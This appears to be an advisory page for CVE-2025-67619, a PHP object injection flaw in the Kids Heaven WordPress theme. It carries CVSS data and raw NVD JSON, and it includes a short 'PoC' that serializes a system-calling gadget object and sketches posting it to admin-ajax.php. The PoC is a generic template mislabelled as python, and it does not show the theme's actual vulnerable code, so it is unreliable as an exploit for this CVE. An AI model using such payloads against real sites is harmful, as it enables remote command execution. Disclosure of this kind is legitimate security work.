Security Vulnerability Report
中文
CVE-2025-67619 CVSS 8.8 HIGH

CVE-2025-67619

Published: 2026-01-22 17:16:02
Last Modified: 2026-04-15 00:35:42

Description

Deserialization of Untrusted Data vulnerability in designthemes Kids Heaven kids-world allows Object Injection.This issue affects Kids Heaven: from n/a through <= 3.2.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Kids Heaven kids-world theme <= 3.2
designthemes Kids Heaven theme 所有版本至3.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php // CVE-2025-67619 PoC - PHP Object Injection // Target: WordPress Kids Heaven Theme <= 3.2 class ExamplePopChain { public $callback; public function __construct() { // Construct malicious callback $this->callback = 'system'; } public function __wakeup() { // Triggered on unserialize() if (isset($this->callback)) { call_user_func($this->callback, 'id'); // Execute system command } } } // Generate malicious serialized payload $payload = serialize(new ExamplePopChain()); echo "Malicious Payload: " . $payload . "\n"; echo "Base64 Encoded: " . base64_encode($payload) . "\n"; // Attack vector: // 1. Find the unserialize() sink in the theme // 2. Send the payload via POST/GET parameter // 3. Example: POST /wp-admin/admin-ajax.php -d 'action=theme_action&data=BASE64_PAYLOAD' ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67619", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:02.090", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Deserialization of Untrusted Data vulnerability in designthemes Kids Heaven kids-world allows Object Injection.This issue affects Kids Heaven: from n/a through <= 3.2."}, {"lang": "es", "value": "Vulnerabilidad de deserialización de datos no confiables en designthemes Kids Heaven kids-world permite la inyección de objetos. Este problema afecta a Kids Heaven: desde n/a hasta &lt;= 3.2."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/kids-world/vulnerability/wordpress-kids-heaven-theme-3-2-php-object-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}